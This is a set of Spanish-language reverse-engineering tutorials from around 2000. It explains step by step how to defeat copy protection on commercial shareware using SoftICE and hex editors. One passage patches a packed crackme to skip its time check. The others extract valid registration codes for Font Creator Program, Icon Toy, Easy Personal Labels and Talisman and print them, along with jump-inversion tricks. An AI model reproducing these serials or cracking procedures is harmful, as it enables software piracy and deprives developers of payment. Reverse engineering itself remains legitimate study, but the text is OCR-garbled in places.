una compresión poco comprensible 


usando utilidades como gettyp a veces se descubre con qué empaquetador se ha comprimido el programa. también se 
puede abrir el exe en un editor hexadecimal y mirar en las primeras líneas por si viene el nombre del compresor. así 
mismo se puede recurrir a un editor de cabeceras pe, que muestran los nombres de las secciones (en ocasiones una de 
ellas lleva el nombre del compresor). 

los intentos al respecto no dieron resultados positivos. parece que r!sc se ha ocupado de borrar las huellas: la última 
sección de la cabecera carece de nombre. 

el proceso de descompresión manual resulta bastante desalentador. a diferencia de otros compresores que he visto, este 
no termina sus rutinas de descompresión con un salto al punto de entrada. tras muchas pruebas llegué a la conclusión 
de que tras 5 o 6 repeticiones de un bucle se llega al punto de entrada desde una instrucción movsb !!! que lo que se 
supone que hace es copiar bytes de una cadena en esi a edi. vamos a tomar la instrucción movsb como punto final de 
la rutina de descompresión, sin saber qué pasa de ahí en adelante, ni cuál es el nuevo punto de entrada. pero, al 
menos, tratemos de hallar por dónde pasa. 

en softice repetimos el bpx getlocaltime y f5. cuando se detiene, f12 para volver al código del programa y estamos en 
la instrucción siguiente a la llamada a la api getlocaltime. miramos el código por encima de la api (ctrl + flecha arriba) 
y no tiene buena pinta. tecleamos d eip para verlo en la ventana de datos y usamos alt+flecha arriba/abajo para 
desplazarnos por ella. aquí sí que se ven más cosas en la parte derecha de la ventana, que muestra los valores en ascii. 
poco más arriba de la dirección de la llamada (00406237) vemos cadenas de datos (la dirección electrónica de r!sc, 
etc). más abajo también se ven otras cadenas que aparecen en los mensajes del crackme. parece que entre estas dos 
zonas r!sc ha colocado la porción de código que nos ocupa. softice no muestra esa distinción entre datos y código, e 
interpreta (como numega le dió a entender) todos los bytes como instrucciones de código ejecutable. por eso, lo que 
aparece por encima da la llamada a la api en la ventana de código no tiene mucho sentido. a partir de la llamada, sin 
embargo, es bastante claro. si os fijáis, la cadena risc notme.com termina en 0040632f. desde ahí hasta 00406237 
(call getlocaltime) hay unos cuantos octales que softice agrupa en dos instrucciones sin sentido aparente: 60 bf y 
2062400057. si domináis el assembly, (cosa que todo el mundo recomienda para progresar rápidamente en esto de las 
desprotecciones) ya os habréis dado cuenta de lo que pasa. 

con hiew abrimos el crackpad.exe. no vamos a esa dirección porque no está en el archivo comprimido, antes de que 
sea cargado en memoria y, además, porque no importa. en cualquier punto, eso sí en modo decode (f4), pulsamos f3 
para entrar al modo de edición y tecleamos el primer octal (60h) y hiew salta a la linea siguiente. seguimos 
tecleando los octales (bf a0 62 40 00 57). en la siguiente linea agrupa los cinco siguientes y salta a la linea de abajo 
para escribir el que falta (57). el resultado es 


60 pushad 
bfa0624000 mov edi, 004062a0 
57 push edi 


¡hiew interpreta los códigos octales de modo inteligente! ahora ya tiene sentido. la api getlocaltime precisa un solo 
argumento, que es la dirección donde guardar los datos que devuelve (año, mes, día de la semana, etc). ya tenemos más 
claro cómo funciona el esquema de protección: al terminar de descomprimirse el archivo se salta (muy probablemente) 
a 00406230, que es donde comienzan las instrucciones de la protección. 


buscar un lugar para el injerto 


cuando se puede determinar exactamente cuál es la última instrucción de la rutina de descompresión, basta con 


comprobar que el punto al que se saltará para escribir el injerto ya se haya desplegado en la memoria, porque el 
programa ya no lo machacará. pero con este compresor el problema es más complejo: al estar el punto desde donde 
vamos a saltar en un bucle que se ejecuta varias veces, es necesario que el lugar a donde salte este “ahí”, presente 
desde el primer momento, y no sea sobreescrito o borrado por las rutinas de descompresión. también tiene que 
continuar en su lugar una vez descomprimido todo el programa (mi duda sobre la última vuelta del bucle). 

en primer lugar, miramos con hiew (f4 para modo hex) las zonas “libres” (con varios ceros seguidos) (se necesitan 20 
bytes de espacio para codificar el injerto) del archivo comprimido. hay tres o cuatro lugares: dos bastante amplios y un 
par de huecos más pequeños. a continuación comprobamos si esas zonas permanecen inalteradas a lo largo del proceso 
de descompresión. en softice ponemos un bpx en 0040c0f5, que es donde termina el bucle. tecleando d 

“dirección elegida'' se puede ir viendo en la ventana de datos si se ven afectadas en la descompresión. 

la mitad de las zonas no nos sirve. como no son muchos los bytes a escribir, optamos por una pequeñita: 0040880b; 
queda como más íntimo... 


escribir el injerto 


el siguiente paso es escribir las instrucciones necesarias. para hallar los “octales” hay que ir a softice y usar el comando 
“a” porque el programa está comprimido y, en frió, con un editor hexadecimal no se pueden calcular correctamente los 
desplazamientos (offsets) de los saltos. 

(con el término “octal” me refiero a las parejas de valores hexadecimales con que se codifican las instrucciones. más 


abajo se ve, por ejemplo, que el código octal de “push 00” es “6a 00”). 


17) el salto desde el final del bucle a la ubicación del injerto. 

lanzamos de nuevo crakpad.exe desde el loader de softice. bpx en 0040c0f5 y f5... al detenerse la ejecución se ve que 
esta es una instrucción de un solo octal. necesitamos 5 para codificar el jmp. el salto lo vamos a poner por encima de la 
misteriosa 0040c0f5  a4 movsb para que al volver del injerto esta sea la última instrucción que se ejecute. 
retrocedemos un poco en el código... bien, vamos a poner el salto tres instrucciones más arriba porque entre las tres 
suman 5 octales: 

0040c0f0 6200  pushad 

0040c0f2  32d2  xor dl, dl 

0040c0f4  4b dec ebx 

0040c0f5 as movsb 

ahora tecleamos a 0040c0f0 y enter para escribir esa instrucción. aparece la dirección y escribimos 

0040c0f0 jmp 0040880b (enter dos veces) 

en la ventana de código de softice aparece el correspondiente código octal que precede a cada instrucción. 

0040c0f0 e916c7ffff ¡mp  0040880b 

hay que anotar el código octal tanto de las 3 instrucciones que vamos a eliminar, como del salto para editar luego en 
frío con hiew el archivo. además, hay apuntar las tres primeras instrucciones para escribirlas en el injerto. (si imprimes 
este tut puedes ahorrate el trabajo) 

ahora quitamos el bpx 0040c0f5 y ponemos otro en 0040c0f0. f5 para que el bucle dé otra vuelta. 

softice para en el salto que hemos creado. pulsamos f10 para que nos lleve a la ubicación elegida para el injerto. 


2”) el mini-injerto 

estamos en 0040880b y solo se ven parejas de ceros que softice intenta reconocer como código ejecutable (0000 ad 
[eax], al). lo primero que hay que hacer es restaurar el código que nos hemos cargado antes, al escribir el salto que nos 
ha traído hasta aquí. tecleamos a eip (con este comando se edita la línea donde se ha detenido la ejecución) y enter 
para escribir la instrucción, y tecleamos las tres instrucciones seguidas cada una de un enter: 

0040880b push 00 

0040880c  xor dl, dl 

0040880e dec ebx 

según las vamos escribiendo van apareciendo en la ventana de código, precedidas de sus correspondientes códigos 
octales. como ya hemos anotado estos últimos, pasamos a la 2* parte del injerto: codificar la(s) instrucción(es) 
necesarias para parchear el código original y burlar de ese modo la protección temporal. 

la instrucción que vamos a escribir a continuación de las tres anteriores (sin salir del modo “a”) mueve unos bytes a 
una dirección de memoria. bytes: los precisos para codificar una instrucción en su dirección de destino. dirección de 
memoria: 00406230, es decir, donde r!sc prepara el terreno para que actúe la api getlocaltime. la instrucción que 
vamos a codificar es un salto (¡mp) que nos llevará, saltando por encima del esquema de protección, a otro salto que, a 
su vez, nos lleva al punto de entrada original del bloc de notas. ¿por qué un salto a otro salto y no un salto directo al 
oep? la respuesta es que si fuera de este último modo necesitaríamos codificar una instrucción de 5 bytes y en el injerto 


eso supondría una línea más, unos cuantos bytes más. para codificar un salto lejano necesitaríamos dos instrucciones: 
una que moviera una doble palabra y otra que moviera un byte, porque el código octal del salto largo (el directo al oep) 
sería e9 cb ad ff ff. 

tal y como lo haremos, con una sola instrucción que mueva una palabra (2 bytes) podremos codificar un salto 
cercano. 

bien, la instrucción es mov word ptr [00406230], 30eb y aparece así en la ventana de código de softice tras pulsar 
enter: 

00408810  66c70530624000eb30 mov word ptr [00406230], 30eb 

aún no hemos terminado. la tercera parte del injerto es el salto que nos envía al punto desde donde vinimos al injerto, 
para que el programa siga ejecutándose, una vez hemos hecho los cambios que queríamos. tecleamos jmp 0040c0f5 
(enter dos veces, porque hemos terminado de editar el código). la nueva línea que aparece en la ventana de código es 
00408819 e9d7380000 ¡mp 0040c0f5 

no olvidéis apuntar el código octal de las instrucciones codificadas porque lo necesitaremos más adelante para editar el 
archivo en frío. es lo que aparece con caracteres verdes. 

la línea con fondo blanco en softice nos recuerda que la siguiente instrucción a ejecutar es la correspondiente a 
0040880b. si ahora pulsamos varias veces f10 volveremos al bucle. si pulsamos f5 el programa ejecuta todas las 
instrucciones hasta el siguiente breakpoint. como tenemos aún uno puesto en 0040c0fO0, tecleamos be * para quitarlo. 
si pulsamos f5 ahora, el programa sigue su curso y nos abre el crakpad. 


editar el archivo 


los cambios efectuados hasta ahora han sido hechos estando el programa en ejecución y no permanecen una vez que se 
cierre crackpad.exe. para hacerlos permanentes hay que usar un editor hexadecimal. abrimos una copia de crakpad.exe 
en hiew, pulsamos f5 para desplazarnos a las direcciones a modificar. primeramente tecleamos .0040c0f0 (el punto del 
principio nos permite introducir la dirección en memoria, sin tener que recurrir al desplazameinto del archivo, el cual 
tendríamos que calcular previamente). luego pulsamos f3 e introducimos el codigo octal correspondiente al salto al 
injerto. f9 para guardar los cambios y f5 de nuevo para ir a 0040880b (con el . por delante) ; f3 y escribimos los octales 
de las cinco instrucciones que conforman el injerto. f9 y esc para salir de hiew. 

tarea completada. 


saludos 

aprovecho la ocasión para enviar un saludo a karpoff, que tras un año sigue siendo "la referencia" para muchos de 
nosotros; a profesor x por su entusiasmo y dedicación al proyecto tutoriales 2000; por supuesto, también a todos los 
participantes en dicho proyecto, sobre todo a los más activos (entre los que no me puedo incluir, de momento) por 
animar, y de qué manera, el cotarro; a numit_or por sus tutoriales, que es capaz de hacernos aprender cosas de tanto 
nivel con facilidad y disfrute; y a todos los que colaboran de algún modo para que el reversing sea un entretenimiento 
tan ameno. 

nada más. para lo que sea f_franticO hotmail.com 
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introduccion 


hola amigos, presento mi quinto tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmago hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras 


cosas. he decidido profundizar el uso de softice. si no lo tienes instalado puedes bajártelo en 
www.crackstore.com . asumo que tienes conocimientos básicos sobre el uso de softice. 
y para terminar con la intro debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


al atake 


abrimos el programa y nos aparece la típica nag...se verá así:. 


The Font Creator Program 


TAE Pa EE gs 
MA > LEN q 


A 


a A 
A 
The registered: O q) Jay fhis notice. 


HIGH-LOGIC Start Register 


ahora me doy cuenta que estos tipos no quieren que se nos olvide que no estamos 
registrados. 
damos click en register y vemos una caja de registro que nos pide los siguientes datos: 


-user name 
-company (if applicable) 
-registration password (lo que buscamos) 


llenamos la caja con cualquier dato y luego le damos click a register y como el programa no 
es estúpido, por supuesto que la registration password no será aceptada y desplegará este 
mensaje de registro falso: 


a continuación... cerramos font creator program. 

debemos recopilar la mayor cantidad de información para saber por dónde atacar a este 
programa y para eso utilizaremos el genial file inspector v2.0 el que nos mostrara si fep ( 
font creator program= fcp desde ahora) está encriptado y también en qué leguaje está hecho. 
abrimos file inspector v2.0 ,luego vamos a abrir archivo, y cuando hayas abierto el 
ejecutable (fcp3.exe) luego le damos click a analizar y luego a la lengieta que dice 
compilador...se verá así: 


eN file insPEctor 2.0 


Reconocimiento de signaturas 


Compilador; Borland Delphi 3.0 
Packer: No encontrado 


Encriptador; No encontrado 


Versión de la librería: fi 0 Información. .. 


Versión del enlazador: [2.25 Versión de la imágen; [0.0 
Versión del 50; In ¿0 Versión del Subsistema: [4.0 


Só Abrir archivo WS Analizar (Salir 


¡Gijarchivos de programalHigh-LogiciFont Creator ProgramiFcp3.exe 


con la información que ahora tenemos sumado al mensaje que el programa desplegó de 
registro falso optaremos por usar el softice para conseguir un código de registro. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos 
sobre su uso. a continuación... abrimos fcp y nos aparece la nag que está al inicio de este 
tutorial en la que está la opción register, la que al presionar nos mandará a la caja de 
registro. introducimos nuestro nombre, compañia, y un número de registro que debemos 
recordar para cuando estemos 

dentro del softice y veamos las comparaciones; todavía no damos click en register; lo que 
ahora debemos hacer es presionar control+d para que salte el softice y así poder colocar 
nuestro breakpoint. 


ya estamos dentro del softice... colocamos bpx hmemcpy y presionamos enter, luego 
presionamos f3 para salir del softice. ahora le damos click a register y si todo sale bien el 
bpx debería picar y hace saltar al softice. 

luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y 
estaremos aquí: 


015f: 004f£557b ff£75f8 push dword [ebp-08] 
luego le damos más o menos 41 toques a f10 para llegar aquí: 
015f: 004f5612 es4debfOff call 00404164 


luego presionamos f8 para entrar en la call... llegaremos aquí: 


015f: 00404164 53 push ebx 

presionamos f10 5 veces, para llegar a una comparación realmente sospechosa... 
015f: 0040416b 39d0 cmp eax,edx 

hey !! llegó la hora de preguntar : ) 

colocamos d eax y la windows data nos muestra esto: 

w9v8371w3xqp 

huy, al parecer la hemos encontrado y si colocamos d edx veremos la falsa 
123123123123 


que más decir, ya la hemos encontrado. ahora anotamos el código y presionamos f5 para 
salir del softice, abrimos el programa y luego insertamos el mismo nombre y la compañía 
que habíamos puesto antes de entrar al softice, lo único que debemos variar es el código de 
registro, 

: ) obviamente. en mi caso: 


-user name act mago 
-company (if applicable) nn 


-registration password w9v8371w3xqp 


le damos click a register y nos sale esto: 


Information ES 


UU) Thank. pou for registerna Font Creator Program. 


programa crackeado... 
nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmago Ohotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. ( especialmente a xasx, 
(no pararé : ) ) y profesor x.) saludos a toda la people de tutoriales2000. 


saludos al 1.d.a. (monofeo , flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos 
los demás). saludos a todos los crackers del mundo. 


chao !! 
espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus 


habilidades, pero recuerden, lean muchos tutoriales, practiquen, estudien y crackear será 
mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Icon Toy V 3.1 


Trial 30 días 


Conseguir un número de serie válido 


Este programa sirve para extraer íconos desde archivos como: 


ICL, EXE, DLL, SCR, CPL, OCX y BMP. Además 
funciona como manipulador de wallpaper (fondo)... 


Novato 

http://www.lighttek.com 

File inspector v 2.0 y SoftlIlce v 4.05 

Act Mago FECHA: 25/10/2000 


introduccion 


hola amigos, presento mi cuarto tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmago hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras 


cosas. . he decidido comenzar a mostrar el uso de softice, ya que en mis tres tutoriales anteriores no lo usé y 
me parece sumamente importante usarlo para que aquellos que saben muy poco o nada vean el potencial de 
esta importante herramienta. si no lo tienes instalado puedes bajártelo en www.crackstore.com asumo que 


tienes conocimientos básicos sobre el uso de softice. 
y para terminar con la intro debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


aabrimos el programa y se ve todo normal, no hay nags ni nada que nos moleste... parece 


freeware : ) le hechamos un vistazo a los botones que tiene y nos encontramos con una Y 


al atake 


(registration) al lado del ? (about). le damos click a la Y y nos aparece la típica caja de 
registro que en esta oportunidad nos pide: 


-registration name: 
-registration number: 


la caja luce así... 


ICO, 


¿bout 


llenamos la caja con cualquier dato y luego damos click en register!. 


el programa desplegará el siguiente mensaje de error...: 


liconTOY 3 


a continuación...cerramos icontoy. ahora debemos saber algunas cosas importantes antes de 

actuar y para eso utilizaremos el genial file inspector v2.0, herramienta que conocí gracias a 
un tutorial de profesor x ; básicamente lo que necesitamos saber es que si este programa está 
encriptado y en que lenguaje está hecho. 

abrimos file inspector v2.0 luego vamos a abrir archivo, y cuando hayas abierto el ejecutable 


(icontoy.exe) luego le damos click a analizar y luego a la lengiúeta que dice compilador... se 
verá así: 


eN file insPEctor 2.0 Aa ES 


Datos PE | Tabla de objetos | Importaciones/Exportaciones | mplador 1] Herramientas | Ácerca de... | 


arenas rnnr rana anna dé 


Reconocimiento de signaturas 


Compilador;  Borland/Inprise Delphi 4 
Packer: No encontrado 


Encriptador; No encontrado 


Versión de la librería: (1.0 Información... 


Versión del enlazador:; [2.25 Versión de la imágen; fo.o 
Versión del 50; In 0 Versión del Subsistema; [4.0 


S Abrir archivo 57 Analizar GF salir 


i¡ciArchivos de oroaramalLiohttekiIcontowticontow.exe 


con la información que ahora tenemos sumado al mensaje que el programa desplegó de 
registro falso optaremos por usar el softice para conseguir un número de registro. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos 
sobre su uso. a continuación... abrimos icontoy y vamos a la caja de registro, en donde 
colocamos nuestro nombre y un número de registro al azar. todavía no damos click en 
register!; lo que ahora debemos hacer es presionar control+d para que salte el softice y así 
poder colocar nuestro breakpoint. 

ya estamos dentro del softice... colocamos bpx hmemcpy y presionamos enter, luego 
presionamos f3 para salir del softice. ahora le damos click a register!, y si todo sale bien el 
bpx debería picar y hacer saltar al softice. 

luego presionamos f11 1 vez ---> f12 6 veces, ponemos bc* para quitar el bpx, estaremos 
aquí: 


015f: 0042397e Se pop esi 

luego presionamos f10 más o menos 34 veces para llegar aquí: 
015f: 00485fa0 esb3fcffff call 00485058 

luego presionamos f$8 para entrar en la call... 

llegaremos aquí: 


015f: 00485c38 55 push ebp 


presionamos f10 8 veces para llegar a una gran cantidad de comparaciones: 
015f: 00485c6b 3d8ca6ba00 cmp eax,00baa68c 
aquí debemos parar el largo traceo, y comenzar a preguntar : ) 


colocamos d eax y la windows data (wd) se queda en blanco, entonces colocamos ? eax y 
vemos nuestro número falso 0001233321 (sin contar los ceros) por supuesto. entonces 
colocamos ? OObaa68c y vemos lo siguiente: 


0012232332 ------ > un número de serie válido !!!!! (sin contar los ceros) 
anotamos el número y luego presionamos f3 para salir del softice. 

ahora insertamos los datos en la caja de registro, en mi caso: 
registration name: act mago 


registration number: 12232332 


damos click en register! y veremos esto:: 


You are registered! Thank you. 


programa crackeado... y si no te gusta el serial number puedes conseguir muchos más en la 
gran cantidad de comparaciones. 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmago Ohotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. ( especialmente a xasx, 
(no pararé : ) ) y profesor x.) saludos a toda la people de tutoriales2000. 

saludos al 1.d.a. (monofeo , flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos 
los demás). saludos a todos los crackers del mundo. 

chao !! 

espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus 
habilidades, pero recuerden, lean muchos tutoriales, practiquen, estudien y crackear será 
mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Easy Personal Labels v2.5 rev.l1 


Limitacion de Tiempo 
Conseguir el numero de registro valido 


Con este programa podrás imprimir etiquetas profesionales para 
tus Cartas y tus disquetes, sin necesidad de ser un diseñador 
experimentado. 


Novato 


http://member.aol.com/jgraff 


Softice £ File Inspector 


Act Mag0 FECHA: 25/10/2000 


INTRODUCCION 


hola amigos, presento mi sexto tutorial.ya saben, si tienen alguna duda sólo pregúntenlo actmagoGhotmail.com , 
como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. he decidido profundizar el 
uso de softice. si no lo tienes instalado puedes bajártelo en www. crackstore.com . asumo que tienes conocimientos 
básicos sobre el uso de softice. y para terminar con la intro debo decir : este texto ha sido escrito sólo con 
propósitos educacionales. 


al atake 


abrimos el programa y todo se ve normal pero si vamos a file hay una opción para registrar el programa que dice register 
shareware, le damos click y aparece una caja de registro para insertar los siguientes datos: 


name: 
registration code: 


registration number: 


como hacemos siempre insertamos cualquier dato y le damos click al botón OK y como el programa no es estúpido por 
supuesto que no aceptará los datos y mostrará algo así... 


Easy Personal Labels xl 


Incorrect code, please reenter. 


a continuación. ..cerramos easy personal labels. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v2.0 el que nos mostrara si está encriptado y también en que leguaje está hecho.abrimos file 
inspector v2.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable (ezlabels.exe) luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


eN file insPEctor 2.0 


or | Herramientas | Acerca de... | 


Datos PE | Tabla de objetos | Importaciones/Exportaciones 


Reconocimiento de signaturas” | 


Compilador: No encontrado 
Packer: ASPack v1.08.04 
Encriptador: No encontrado 


Versión de la librería: fi 0 Información... 


Versión del enlazador: [2.25 Versión de la imágen: fo.o 
Versión del SO; fi 0 Versión del Subsistema; [4.0 


ES Abrir archivo 8 Analizar GH salir 


¡CijArchivos de programalEasy Personal Labelsiezlabels.exe y 


hey !!! este programita viene empacado. ..que podemos hacer... : ), por mi parte usaré softice para encontrar un registro 
válido. 


a continuación... cerramos file inspector v2.0. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos easy personal labels y vamos directamente a la caja de registro en donde introducimos nuestro 
nombre, cualquier registration code y number respectivamente. todavía no damos click en OK; lo que ahora debemos hacer 
es presionar control-+d para que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a OK y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos aquí: 
015f: 00450349 8b8528feffff mov eax, [ebp-01d8] 


luego f10 1 vez para llegar aquí: 


O15f: 0045034f ba00054500 mov edx, 00450500 


la mayoría de las veces chequeo los valores, los saltos, las comparaciones o lo que sea antes de una call y aquí si colocamos 
un d eax veremos nuestro registration code falso (en mi caso 1122), que raro ? : ) y si colocamos d 00450500 veremos 
zenith, más sospechoso que lo anterior. damos f10 1 vez para llegar a la call que está abajo de esta sospechosa línea...se 
verá así: 


015f: 00450354 es8f33fbff call 004036e8 

para entrar en la call le damos a f8 1 vez para llegar aquí: 

015f: 004036e8 53 push ebx 

ahora presionamos f10 5 veces para llegar a esta comparación... 

015f: 004036ef 39d0 cmp eax,edx 

colocamos d eax y la windows data nos muestra esto: 

1122 

nuevamente nos topamos con nuestro registration code falso y si colocamos d edx veremos esto: 
zenith 


que más decir, ya hemos encontrado nuestro registration code, pero que hay del registration number ??? algo me huele mal 
porque ni siquiera nos hemos topado con nuestro registration number falso, pero abajo de la comparación hay una línea a la 
que llegamos dando f10 1 vez, la que se verá así... 


O15f: 004036f1 Of848f000000 jz 00403786 


al parecer este salto debe decidir algo importante y abajo hay un test... qué pasaría si invertimos el salto y apretamos f5 para 
ver que sucede ?? si no sabes como invertir esto se hace colocando r fl z 


invertimos, presionamos f5 y vemos esto... 


Easy Personal L... ES 


Registration complete. 


por lo menos yo estaba preocupado y era así de fácil : ), no puedo creerlo, cierro el programa, lo abro y estoy registrado. 
esto se debe a que el programa crea un archivo llamado lreg.dt que contiene los datos del registro, y el programa cada vez 
que se reinicia lo revisa y ve tu estado. podemos deducir que en la caja de registro debemos colocar esto: 


name: act mago 

registration code: zenith 

registration number: (cualquiera) 

mientras escribía este tutorial me registre con otro nombre, lo que dejaria la caja así: 
name: (cualquiera) 


registration code: zenith 


registration number: (cualquiera) 


programa crackeado... 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagothotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. especialmente a xasx, (no pararé : ) ) 
saludos a dek_oin. 


saludos a toda la people de tutoriales2000. saludos a profesor x. 


saludos al l.d.a. (monofeo (gran amigo), flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos los 
demás) 


saludos a todos los crackers del mundo. 


chao !! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, 


lean muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa Talisman 1.61 

PROTECCION: Name / Serial 

Ojetivo: Conseguir un código de registro válido 

Descripcion: Utilidad de escritorio 

Dificultad: Novato 

DOWNLOAD : www.lighttek.com 

Herramientas: Softice 4.05, File inspector 3.0 

CRACKER: Act Mago FECHA: 25/10/2000 
INTRODUCCION 


hola amigos, presento mi séptimo tutorial.ya saben, si tienen alguna duda sólo pregúntenlo actmagoU'hotmail.com , 
como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. he decidido profundizar el 
uso de softice. si no lo tienes instalado puedes bajártelo en www. crackstore.com . asumo que tienes conocimientos 
básicos sobre el uso de softice. y para terminar con la intro debo decir : este texto ha sido escrito sólo con 
propósitos educacionales. 


comentario del programa 


una nueva y revolucionaria aproximación al escritorio de windows 98. no es un simple creador de temas de 
escritorio, sino que te ocultará el escritorio normal y lo cambiará por otro mejor, sin los feos iconos y barras de 
desplazamiento. permite la creación y manipulación sencilla de hasta 999 pantallas diferentes. puedes crear y 
añadir casi cualquier tipo de objeto, y adjuntar cualquier tipo de comando de shell interno o ejecutar cualquier 
aplicación. los objetos, que se pueden ocultar, se pueden programar para reaccionar a los clics del ratón o al 
movimiento del ratón. los tipos de objetos disponibles incluyen el menú de inicio, los menús de tareas, y los menús 
de carpetas.podrás añadir imágenes de fondo al escritorio y añadir sonidos a diferentes eventos. toda la 
configuración y las imágenes se guardan en un fichero de base de datos. incluso puedes crear más de una base de 
datos y usar objetos que enlacen de una base de datos a la otra.en definitiva, si estás cansado de ver siempre el 
mismo interfaz de windows, y quieres darle un toque personal, no hay mejor opción que la de probar taslimán. 


comentario sacado desde softonic debido a que no he tenido tiempo para probar el programa. 


lo que nos interesa... el programa es distribuido como shareware con período de prueba de 30 días, por lo tanto si 
quieres seguir usando el software deberás pagar us$ 25.00 


por suerte contamos con softice... 


al atake 


abrimos el programa y todo se ve normal, pero si damos click con el botón derecho del mouse, veremos la alternativa 
about/registration... , le damos click y aparece la caja de registro solicitándonos los siguientes datos: 


your name: 
your code: 


como hacemos siempre insertamos cualquier dato y le damos click al botón register! y como el programa no es estúpido 
por supuesto que no aceptará los datos y mostrará algo así... 


a continuación...cerramos talisman. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0 el que nos mostrara si está encriptado y también en que leguaje está hecho.abrimos file 
inspector v3.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable (talisman.exe) luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


£, -= file insPEctor v3.0 - By ViPER [ K-FOR ] - Released 23/10/00 =- 


Reconocimiento de signaturas 


Compilador; Borland /Inprise Delphi 4 
Signatura; 
Versión de la DLL; [r 0 Información... ED Asociar EXE 's 


Versión del enlazador:; [2.25 Versión de la imagen; fo. 
Versión del 50; hi AN) Versión del subsistema; fa. 


ES) Abrir archivo... (Ey Analizar GH salir 


¡CAtalismanttalisman, exe 0 


con la información que tenemos creo que el camino más fácil será usar nuestro querido softice para conseguir un código de 
registro válido. 


a continuación... cerramos file inspector v3.0. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos talisman y vamos directamente a la caja de registro en donde introducimos nuestro nombre y 
cualquier código de registro. todavía no damos click en register!; lo que ahora debemos hacer es presionar control-++d para 
que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a register! y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos aquí: 
015f: 0047ef27 837df400 cmp dword ptr [ebp-0Oc] , OO 

luego f10 14 veces para llegar aquí: 

015f. 0047ef65 e8023af8ff call 0040296c 


aquí colocamos d eax y la window data se quedará en blanco y si aquí mismo colocamos ? eax veremos nuestro código de 
registro falso. se podría decir que vamos por el camino correcto. 


luego f10 16 veces para llegar aquí: 
015f. 0047ef9a 75f2 ¡nz O04ef8e “ 


aquí este salto nos manda de vuelta en el traceo con f10, abajo se ve una call a la que podemos llegar poniendo un bpx 
(supongo que ya pusiste bc *), entonces ponemos: 


bpx 004 7ef9a 

luego presionamos f5 y el softice nos dará un pantallazo que nos dejará aquí: 

015f: 0047efa2 e8c539f8ff call 0040296c 

luego presionamos f10 3 veces para llegar aquí... 

015f: 0047efaf 3b75fc cmp esi, [ebp-04] 

esta comparación es decisiva para mí. colocamos ? eax y veremos esto: 

0000519036 (recuerda este número, pero sin los ceros obviamente) : ) ya lo tenemos. 
pero cómo podemos estar tán seguros? si miras más abajo podrás ver un salto como este: 
015f: 0047efb2 Of85bf000000 ¡nz 00471077 


si inviertes el salto colocando r fl z y das f5 verás esto: 


Registered for 4ct Magú 


4 TALISMAN 


Program by Arkadiy istomin 


ya no tenemos dudas, volvemos al softice presionando control+d y ponemos bc *. cerramos talisman, lo volvemos a abrir, 
vamos a la caja de registro y colocamos nuestro nombre (el mismo que pusiste al comenzar con softice) y nuestro número de 
registro recién obtenido, en mi caso: 


your name: act mago 
your code: 519036 
damos click en register! y.... 


programa crackeado... 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagothotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. especialmente a xasx, (no pararé : ) ) 
saludos a dek_oin. 
